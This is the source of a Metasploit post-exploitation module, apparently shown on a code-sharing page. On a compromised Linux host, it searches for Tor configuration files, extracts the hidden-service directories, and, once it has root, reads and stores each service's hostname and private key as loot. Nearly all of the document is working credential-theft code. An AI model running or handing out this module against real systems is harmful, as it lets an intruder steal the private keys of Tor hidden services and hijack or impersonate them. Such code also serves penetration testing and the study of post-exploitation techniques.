Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
# Adapted from post/linux/gather/enum_configs.rb
6
##
7

8
class MetasploitModule < Msf::Post
9

10
  include Msf::Post::Linux::System
11
  include Msf::Post::Linux::Priv
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Linux Gather TOR Hidden Services',
18
        'Description' => %q{
19
          This module collects the hostnames name and private keys of
20
          any TOR Hidden Services running on the target machine. It
21
          will search for torrc and if found, will parse it for the
22
          directories of Hidden Services. However, root permissions
23
          are required to read them as they are owned by the user that
24
          TOR runs as, usually a separate account.
25
        },
26
        'License' => MSF_LICENSE,
27
        'Author' => [
28
          'Harvey Phillips <xcellerator[at]gmx.com>',
29
        ],
30
        'Platform' => ['linux'],
31
        'SessionTypes' => ['shell', 'meterpreter']
32
      )
33
    )
34
  end
35

36
  def run
37
    print_status("Running module against #{get_hostname} (#{session.session_host})")
38

39
    distro = get_sysinfo
40
    print_status('Info:')
41
    print_status("\t#{distro[:version]}")
42
    print_status("\t#{distro[:kernel]}")
43
    print_status('Looking for torrc...')
44
    find_torrc
45
  end
46

47
  def save(file, data, ltype, ctype = 'text/plain')
48
    fname = ::File.basename(file)
49
    loot = store_loot(ltype, ctype, session, data, fname)
50
    print_status("#{fname} stored in #{loot}")
51
  end
52

53
  def find_torrc
54
    fail_with(Failure::BadConfig, "'locate' command does not exist") unless command_exists?('locate')
55

56
    config = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n")
57
    if config.empty?
58
      print_error('No torrc file found, maybe it goes by a different name?')
59
    else
60
      hidden = Array.new
61
      # For every torrc file found, parse them for HiddenServiceDir
62
      config.each do |c|
63
        print_good("Torrc file found at #{c}")
64
        services = cmd_exec("cat #{c} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
65
        # For each HiddenServiceDir found in the torrc(s), push them to the hidden array
66
        services.each do |s|
67
          hidden.push(s)
68
        end
69
      end
70
      # Remove any duplicate entries
71
      hidden = hidden.uniq
72
      # If hidden is empty, then no Hidden Services are running.
73
      if !hidden.empty?
74
        print_good("#{hidden.length} hidden services have been found!")
75
      else
76
        print_bad('No hidden services were found!')
77
      end
78

79
      if is_root?
80
        # For all the Hidden Services found, loot hostname file
81
        hidden.each do |f|
82
          output = read_file("#{f}hostname")
83
          save(f, output, "tor.#{f.split('/')[-1]}.hostname") if output && output !~ /No such file or directory/
84
        end
85

86
        # For all the Hidden Services found, loot private_key file
87
        hidden.each do |f|
88
          output = read_file("#{f}private_key")
89
          save(f, output, "tor.#{f.split('/')[-1]}.privatekey") if output && output !~ /No such file or directory/
90
        end
91
      else
92
        print_error('Hidden Services were found, but we need root to access the directories')
93
      end
94
    end
95
  end
96
end
97

98